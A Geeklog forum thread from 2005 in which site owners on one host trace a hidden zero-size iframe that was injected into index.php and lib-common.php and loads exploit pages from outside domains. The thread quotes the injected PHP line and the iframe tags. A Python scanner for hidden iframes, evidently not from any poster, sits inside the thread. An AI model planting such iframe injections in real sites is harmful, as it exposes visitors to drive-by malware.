Subject: unusual iframe on my site

Posted on: 25/03/05 05:38pm
By: usarfans

Today I noticed something unusual when my site loaded. Down in the bottom status bar of IE, I noticed that it was trying to load something from a site NOT of my knowledge. I did a "view source" and found the culprit about 3/4 of the way through the index.php outputted file. It is right before the part at the bottom of the page where you are given links to previous site pages.

Here is the part in question:

<!-- ARTICLE END -->

<iframe src=http://europedirect.biz/frame.php 
frameboarder="0" width="0" height="0" scrolling="no">
</iframe><div class="pagenav">Previous <b>1</b> 


Any ideas what this means? Has the site been hacked? I had plans on upgrading the site to 3.11 this weekend but am not sure if I should yet until I can figure out where this europedirect.biz link came from.

Thanks,

Lou


unusual iframe on my site

Posted on: 25/03/05 05:51pm
By: ScurvyDawg

That's odd.

Do others have access to your layout folder?

You will want to change your passwords.

If you go to the site there is nothing there really except some stats scripts. I would remove the code of course too. Did you get the theme off of someone? Maybe it is just old code?

Good Luck

unusual iframe on my site

Posted on: 25/03/05 05:55pm
By: Dirk

Can you find that IFRAME in the theme files on your webspace? Since the page navigation is added on the fly, it should be in the story templates (storytext.thtml or storybodytext.thtml).

If you can't find it there, it may be inserted by a control in your browser. Are you using Internet Explorer?

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 06:31pm
By: usarfans

ScurvyDawg & Dirk,

Thanks for your fast replies.

To the best of my knowledge, nobody but myself has access to the htdocs/layout folder. Permissions are set to 755.

I am using IE, but I see the same thing using Slimbrowser.

I am basically using the Smooth Blue theme with just a couple of minor color tweaks.

I opened each file in the theme directory (not its subdirectories) and did not find the odd iframe info in any of them.

The only plug-in I am using is the static pages plugin.

When I select a story to read and go to the story page and view the source, the mysterious Iframe is NOT there. It appears to only be on the main index.php page or process.

Still looking at other files..

unusual iframe on my site

Posted on: 25/03/05 06:36pm
By: Dirk

[QUOTE BY= usarfans] I am using IE, but I see the same thing using Slimbrowser.[/QUOTE]
I'm not familiar with Slimbrowser, but from their website it looks like they're still using Internet Explorer as a backend.

Try a different browser, e.g. Firefox or Opera.

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 06:49pm
By: usarfans

I loaded Firefox 1.0.2.

Same results - suspect Iframe still seen. Going to try on a different computer now, although all logic says that is not the problem......

unusual iframe on my site

Posted on: 25/03/05 06:52pm
By: ScurvyDawg

I am using firefox and I see it.

Seems to be part of your site navigation the previous button??


<iframe src=http://europedirect.biz/frame.php frameboarder="0" width="0" height="0" scrolling="no"></iframe>
<div class="pagenav">Previous <b>1</b> 
<a href="http://www.usarfans.com/index.php?page=2">2</a> 
<a href="http://www.usarfans.com/index.php?page=3">3</a> 
<a href="http://www.usarfans.com/index.php?page=4">4</a> 
<a href="http://www.usarfans.com/index.php?page=5">5</a> 
<a href="http://www.usarfans.com/index.php?page=6">6</a> 
<a href="http://www.usarfans.com/index.php?page=7">7</a> 
<a href="http://www.usarfans.com/index.php?page=8">8</a> 
<a href="http://www.usarfans.com/index.php?page=9">9</a> 
<a href="http://www.usarfans.com/index.php?page=10">10</a> 
<a href="http://www.usarfans.com/index.php?page=2">Next</a>
</div>
</td>




Very strange it is right next to your pagination? Seems to be tracking stats??

unusual iframe on my site

Posted on: 25/03/05 06:54pm
By: ScurvyDawg

Yep if you look at your pagination it is there.

a little square next to or above the word previous.

unusual iframe on my site

Posted on: 25/03/05 07:02pm
By: Dirk

I can see it, too.

It doesn't appear to be in the template files. It's also not visible on other pages that use the pagination (e.g. the links).

So it may actually be in your index.php. Make a backup of that file (for forensic analysis), then overwrite it with a fresh copy. See if that helps ...

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 07:07pm
By: usarfans

I don't see the little square (old eyes) but I know that I did not put anything extra like this europedirect.biz iframe into my site code. And if you guys, who have seen a million Geeklog problems, don't recognize it - it only leads me to believe it is malicious in nature somehow.

unusual iframe on my site

Posted on: 25/03/05 07:35pm
By: usarfans

Found the culprit! How I missed it earlier is beyond me.

The index.php file had been modified about 2 days ago and not by myself. I replaced it and the iframe is gone.

All root/admin passwords have been changed. Upgrade is in the very, very near future.

Comparing the bad with the good, the only difference is this one line of code:

$display .= '<iframe src=http://europedirect.biz/frame.php 
frameboarder="0" width="0" height="0" scrolling="no"></iframe>'

I guess I was hacked. Dammit.

Thanks for the rapid and accurate help. We non-geeks really appreciate it - especially when it's obvious we are in over our heads!
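The two checks the thread converges on, a scan for invisible iframes pointing off-site and a line-by-line comparison of a suspect file against a known-good copy (as Dirk suggested), as an added example that is not code from Geeklog or from any poster here. The sample "clean" and "suspect" index.php fragments are constructed; the injected tag is the one quoted in this thread, and www.usarfans.com is used as the site's own host.

```python
"""Hidden-iframe scanner: an added example, not code from Geeklog or any poster
in this thread. Flags <iframe> tags that are 0x0 (invisible) and point outside
an allowlist of your own hosts, the pattern seen here, and lists lines a suspect
file has that a known-good copy lacks."""
import difflib
import re
from urllib.parse import urlparse

# Whole <iframe ...> tag; [^>]* also spans the line break in the posted tag.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Values may be double-quoted, single-quoted or bare (the injected src was bare).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

def parse_attrs(attr_text):
    """Lower-cased attribute name -> value, whatever the quoting style."""
    out = {}
    for m in ATTR_RE.finditer(attr_text):
        out[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return out

def find_hidden_iframes(text, own_hosts):
    """Return [(line_no, host)] for zero-size iframes to hosts not in own_hosts."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        invisible = attrs.get("width") == "0" and attrs.get("height") == "0"
        if host and host not in own_hosts and invisible:
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def lines_added(clean_text, suspect_text):
    """Lines present in the suspect copy but absent from the known-good copy."""
    diff = difflib.unified_diff(clean_text.splitlines(), suspect_text.splitlines(),
                                lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]

# Constructed sample: a clean index.php fragment, then the same fragment with the
# injected line quoted in this thread (split over two lines as posted) plus a
# same-host, visible iframe that must not be flagged.
CLEAN = "<?php\n$display .= $story_html;\n$display .= $pagination;\n"
SUSPECT = CLEAN + (
    "$display .= '<iframe src=http://europedirect.biz/frame.php \n"
    "frameboarder=\"0\" width=\"0\" height=\"0\" scrolling=\"no\"></iframe>';\n"
    "echo '<iframe src=\"http://www.usarfans.com/stats.php\" width=\"300\" "
    "height=\"200\"></iframe>';\n")

if __name__ == "__main__":
    for line_no, host in find_hidden_iframes(SUSPECT, {"www.usarfans.com"}):
        print(f"line {line_no}: hidden iframe to {host}")
```

Run it over each file in the web root (index.php, lib-common.php, the theme directory) and keep the pre-cleanup copy of anything it flags, since the modification time and the added lines are what a host's support ticket will ask for.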



unusual iframe on my site

Posted on: 26/03/05 02:53am
By: Dirk

[QUOTE BY= usarfans] I guess I was hacked. Dammit.[/QUOTE]
It is very unlikely that this was done via Geeklog or any other script you may have running. So better change the passwords for your hosting account as well.

bye, Dirk

unusual iframe on my site

Posted on: 07/04/05 03:38pm
By: rav

I just discovered the exact same thing! I fixed it before I found this thread, and wondered if anyone else had run into the problem. Appears I'm not the only one.

unusual iframe on my site

Posted on: 07/04/05 03:40pm
By: rav

Interesting to note, that my file was changed on March 23rd as well.

unusual iframe on my site

Posted on: 07/04/05 04:06pm
By: beewee

Do you happen to have the same hosting provider?

unusual iframe on my site

Posted on: 07/04/05 06:15pm
By: usarfans


I am using PSekhosting.com

Ever since the original owner of PSek sold (i.e. outsourced) the site a couple of months ago I've had numerous problems with them - SQL crashes, DNS issues, etc. Not a lick of problem before the sale.


Lou

unusual iframe on my site

Posted on: 08/04/05 07:23am
By: rav

I'm using psek as well. I have several sites hosted with them, but only one has been affected.

unusual iframe on my site

Posted on: 08/04/05 09:37am
By: beewee

Did you ever change the passwords you received from Psek? If not, somebody retrieved the passwords or found out how their passwords are generated.

If you did change them, your sites might be vulnerable...

unusual iframe on my site

Posted on: 08/04/05 09:40am
By: rav

Yeah, I changed the passwords from what psek sent me. I submitted a ticket to psek's support and they suggested that it was my geeklog version (still on 1.3. and that I should upgrade. Something I had planned on doing anyway, just haven't had the time yet.

unusual iframe on my site

Posted on: 08/04/05 09:46am
By: beewee

Perhaps it's just my imagination: did you install GL yourself or with your Control Panel? It's quite easy to pack an 'infected' template that way...

BTW there should be an FTP access log somewhere.

unusual iframe on my site

Posted on: 08/04/05 10:28am
By: rav

Installed it myself. I have 4 templates installed, but I haven't touched any of them in quite some time. The site has been running smoothly for almost 2 years now. It was the main index.php file that was modified, not any of the layout files.

I'll go back through and look at the FTP logs.

unusual iframe on my site

Posted on: 02/05/05 12:49pm
By: keystone

I'm using PSEK and my site has been hacked twice. The first time the iframe code was inserted in the index.php and index.html.

This time the iframe code was inserted in Lib-common.php.

I've changed my passwords now a couple of times.

unusual iframe on my site

Posted on: 02/05/05 01:14pm
By: rav

Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last Friday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, they simply blamed it on geeklog. I was on an older version (1.3. so I upgraded and now I'm on 1.3.11.

What version of GL were you running when they hacked you?

unusual iframe on my site

Posted on: 02/05/05 01:17pm
By: usarfans

I'm starting to believe it's an inside job from some person at PSek.com

My lib-common.php file was hacked on 4/29/05 @11:27 am. I bet if you check, yours was done at the same time.

This time this code was added to the file -->

<iframe src=http://vipcontact.net/adbanner.php frameborder="0" width="0" height="0" scrolling="no"></iframe>


It caused Symantec, Trend Micro, and McAfee to alert on it as being a "JAVA_BYTEVER.A" or "Exploit-ByteVerify" Virus.

These recent problems HAVE to be from someone with specific knowledge of Geeklog and the ability to modify system files.

Anybody recommend another ISP????

Lou


unusual iframe on my site

Posted on: 02/05/05 03:36pm
By: Anonymous

The problem that you are describing is the result of a client with an insecure script which allowed a remote user to inject malicious code which in turn affected a few pSek accounts using this Geeklog script. Only accounts using Geeklog were affected so we're still trying to track down the cause.


unusual iframe on my site

Posted on: 02/05/05 03:59pm
By: keystone

[QUOTE BY= rav] Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last Friday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, they simply blamed it on geeklog. I was on an older version (1.3. so I upgraded and now I'm on 1.3.11.

What version of GL were you running when they hacked you?[/QUOTE]
I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?

unusual iframe on my site

Posted on: 02/05/05 04:02pm
By: keystone

Also, my geeklog site is password protected at the web server level. So a user has to authenticate to the web server prior to getting access to geeklog.

In my case, the hacker would have had to have cracked that password as well in order to even run a malicious GL script.

Seems to me that there may be an issue at the PSEK hosting level...

unusual iframe on my site

Posted on: 02/05/05 05:05pm
By: usarfans

[QUOTE BY= keystone] I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?[/QUOTE]

The first hack occurred when I was still running an older version of GL. The hack from Friday was AFTER I had upgraded to 1.3.11.

Lou

unusual iframe on my site

Posted on: 02/05/05 05:06pm
By: rav

no, I was running 1.3.8 both times I got hacked. I'm at 1.3.11 now.

unusual iframe on my site

Posted on: 02/05/05 05:39pm
By: frisco3

Hi all! I have been having the same problem on the psek server called "knicks". I'm curious if everyone else is on the same server. You can see your server name by going to www.yourwebsite.com/cpanel and looking at the section in the bottom right (General Server Information).

I had the malicious code for vipcontact.net in my lib-common file. I removed the malicious code and everything seems to be fine now.

Psek has been pretty good about this issue with me. They admit they are still looking into the cause and say it's because one of their clients uploaded malicious code that then infected the server somehow, but that they've isolated the outbreak. They have given no indication that the file was loaded intentionally by the client or if there was a third party involved.

Note that Brandon Mizrahie above is from psek and I alerted him of this thread earlier today. His quote above is a reply to a support ticket I sent to him.

unusual iframe on my site

Posted on: 03/05/05 07:10am
By: usarfans

Here is the response I got last night from PSek as they closed out the trouble ticket. Make any sense to any of you????


the problem is completely isolated and solved. but we strongly recommend to all our customers to download and install official Microsoft antispyware tool and do the local box full scan to get rid of any sort of spyware:

http://www.microsoft.com/downloads/details.aspx?FamilyID=321cd7a2-6a57-4c57-a8bd-dbf62eda9671&displaylang=en


Lou

unusual iframe on my site

Posted on: 03/05/05 12:46pm
By: rav

They are just warning users to have some sort of anti-spyware / anti-virus software installed on their systems. I have both of course, or I would have NEVER known that there was a problem in the first place.

Some of my users got infected though and they thought it was MY site that was doing it to them.

Support kept telling me that it was the version of GL that I was running. So I upgraded it (which needed to be done anyway ). The fact that you've been affected even after upgrading to 1.3.11 is concerning.

If it happens again, I'm switching hosts.

Geeklog - Forum
https://www.geeklog.net/forum/viewtopic.php?showtopic=50236